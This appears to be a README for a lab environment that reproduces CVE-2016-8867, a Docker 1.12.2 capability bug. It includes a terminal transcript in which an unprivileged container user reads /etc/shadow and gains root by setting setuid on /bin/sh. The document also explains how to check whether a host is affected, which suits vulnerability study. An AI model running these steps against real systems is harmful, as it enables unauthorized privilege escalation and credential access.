
docker v1.12.2 (CVE-2016-8867)

  • dqd:
    • ssst0n3/docker_archive:cve-2016-8867 -> ssst0n3/docker_archive:cve-2016-8867_v0.1.0
    • ssst0n3/docker_archive:cve-2016-8867_v0.1.0
  • ctr:
    • ssst0n3/docker_archive:ctr_cve-2016-8867 -> ssst0n3/docker_archive:ctr_cve-2016-8867_v0.1.0
    • ssst0n3/docker_archive:ctr_cve-2016-8867_v0.1.0

usage

$ cd vul/cve-2016-8867
$ docker compose -f docker-compose.yml -f docker-compose.kvm.yml up -d
$ ./ssh

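reproduce

What to look for: the container is started as the unprivileged user nobody, yet /proc/self/status shows the permitted (CapPrm), effective (CapEff) and ambient (CapAmb) capability sets all populated with the same mask as the bounding set. On an unaffected engine those three sets would be expected to read 0000000000000000 for a non-root user. Because the capabilities are still held, ordinary file-permission checks inside the container do not apply to this user, which is what the /etc/shadow read and the setuid change below demonstrate. Checking the Cap* lines for a non-root container process is therefore a quick way to verify whether a host is affected. The container hostname changes partway through the transcript, so the output comes from two separate container sessions.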

root@localhost:~# docker run -ti -u nobody ubuntu:16.04 bash
nobody@50b080908617:/$ cat /proc/self/status | grep Cap 
CapInh:	00000000a80425fb
CapPrm:	00000000a80425fb
CapEff:	00000000a80425fb
CapBnd:	00000000a80425fb
CapAmb:	00000000a80425fb
nobody@50b080908617:/$ ls -lah /etc/shadow 
-rw-r----- 1 root shadow 652 Aug  4  2021 /etc/shadow
nobody@50b080908617:/$ cat /etc/shadow 
root:*:18843:0:99999:7:::
daemon:*:18843:0:99999:7:::
bin:*:18843:0:99999:7:::
sys:*:18843:0:99999:7:::
sync:*:18843:0:99999:7:::
games:*:18843:0:99999:7:::
man:*:18843:0:99999:7:::
lp:*:18843:0:99999:7:::
mail:*:18843:0:99999:7:::
news:*:18843:0:99999:7:::
uucp:*:18843:0:99999:7:::
proxy:*:18843:0:99999:7:::
www-data:*:18843:0:99999:7:::
backup:*:18843:0:99999:7:::
list:*:18843:0:99999:7:::
irc:*:18843:0:99999:7:::
gnats:*:18843:0:99999:7:::
nobody:*:18843:0:99999:7:::
systemd-timesync:*:18843:0:99999:7:::
systemd-network:*:18843:0:99999:7:::
systemd-resolve:*:18843:0:99999:7:::
systemd-bus-proxy:*:18843:0:99999:7:::
_apt:*:18843:0:99999:7:::
nobody@58f651b73f78:/$ chmod +s /bin/sh
nobody@58f651b73f78:/$ /bin/sh -p 
# id
uid=65534(nobody) gid=65534(nogroup) euid=0(root) egid=0(root) groups=0(root)
# whoami
root

env details

root@localhost:~# docker --version
Docker version 1.12.2, build bb80604
root@localhost:~# docker-containerd --version
containerd version 0.2.4 commit: 0366d7e9693c930cf18c0f50cc16acec064e96c5
root@localhost:~# docker-runc --version
runc version 1.0.0-rc2
commit: 02f8fa7863dd3f82909a73e2061897828460d52f
spec: 1.0.0-rc2-dev
root@localhost:~# docker info
Containers: 0
 Running: 0
 Paused: 0
 Stopped: 0
Images: 0
Server Version: 1.12.2
Storage Driver: aufs
 Root Dir: /var/lib/docker/aufs
 Backing Filesystem: extfs
 Dirs: 0
 Dirperm1 Supported: true
Logging Driver: json-file
Cgroup Driver: cgroupfs
Plugins:
 Volume: local
 Network: null host bridge overlay
Swarm: inactive
Runtimes: runc
Default Runtime: runc
Security Options: apparmor seccomp
Kernel Version: 4.4.0-210-generic
Operating System: Ubuntu 16.04.7 LTS
OSType: linux
Architecture: x86_64
CPUs: 2
Total Memory: 1.953 GiB
Name: localhost.localdomain
ID: ED3X:JKLF:3XAQ:UM7L:Q54N:KZUU:7F27:GEFO:BWSN:ZUON:JQRU:V4J4
Docker Root Dir: /var/lib/docker
Debug Mode (client): false
Debug Mode (server): false
Registry: https://index.docker.io/v1/
WARNING: No swap limit support
Insecure Registries:
 127.0.0.0/8

build

make all DIR=vul/cve-2016-8867

for developers:

FROM ssst0n3/docker_archive:ctr_cve-2016-8867_v0.1.0